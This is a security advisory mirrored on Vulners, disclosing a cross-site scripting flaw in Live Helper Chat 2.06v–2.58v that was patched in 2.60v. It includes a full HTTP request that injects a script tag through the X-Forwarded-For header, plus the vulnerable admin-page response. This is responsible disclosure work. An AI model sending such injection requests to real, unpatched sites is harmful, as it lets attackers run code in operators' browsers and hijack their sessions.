Vulners
Lucene search
Live Helper Chat 2.58v Cross Site Scripting
🗓️ 27 Apr 2017 00:00:00Reported by Sylvain HeinigerType 
packetstorm🔗 packetstormsecurity.com👁 26 Views
`#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#############################################################
#
# CSNC ID: CSNC-2017-004
# Product: Live Helper Chat [1]
# Vendor: Live Helper Chat
# Subject: Cross-Site Scripting - XSS
# Risk: High
# Effect: Remotely exploitable
# Author: Sylvain Heiniger ([email protected])
# Date: April 24, 2017
#
#############################################################
Introduction:
----------------
Live Helper Chat is a live chat support for websites. It provides a simple
solution for companies to get in contact with visitors of their websites. [1]
Compass Security discovered a web application security flaw in the Live
Helper Chat application which allows an attacker to execute JavaScript code in
the browser of a user. This allows, for instance, attacking the user's browser
or redirecting the user to a phishing website. The attack will be in some cases
automatically run in the backend operator's session. Otherwise, one can send
the victim a link to the website with the malicious payload.
Affected Versions:
-----------------------
The following Live Helper Chat versions are vulnerable:
- 2.06v - 2.58v [2]
Patches:
-----------
Live Helper Chat released a patch as part of release 2.60v [3, 4].
Technical Description:
-----------------------------
Live Helper Chat detects the visitor's IP address. To this end, it reads the
"X-Forwarded-For" HTTP header. Any visitor can inject a <script> tag in this
header. It will be reflected in the administrator's "online users" information
page as well as in the "print chat" page.
User's request:
===============
POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1
Host: localhost
X-Forwarded-For: <script>alert(1);</script>
Connection: close
Content-Length: 188
Username=Example&Question=My+question&user_timezone=2&URLRefer=%2F%2Flocalhost%2F&r=&operator=0&StartChat=1&captcha_1977271e431742414c31477d258028664d713ae0=1475518554&tscaptcha=1475518554
===============
Subsequent request to the online users page /lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 will be responded with:
===============
[{"id":"1","ip":"<script>alert(1);<\/script>","vid":"47428qicplsqmfe9huq2", [JSON MESSAGE CUT]
===============
Note: the above JSON response is sent by the application with the content-type text/html,
making it vulnerable to XSS as is.
Milestones:
---------------
2017-03-14: Vulnerability discovered
2017-04-23: Vendor notified
2017-04-23: Vendor provided patched version
2017-04-28: Public disclosure
References:
---------------
[1] https://github.com/LiveHelperChat/livehelperchat/
[2] https://github.com/LiveHelperChat/livehelperchat/commit/f93d092c634f52098d578883ef8d069313d460ec
[3] https://livehelperchat.com/new-version-2.60v-security-update-460a.html
[4] https://github.com/LiveHelperChat/livehelperchat/commit/eee03f77f3f51fed613c5e306152ea60255edba2
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2017 00:00Current
7.4High risk
Vulners AI Score7.4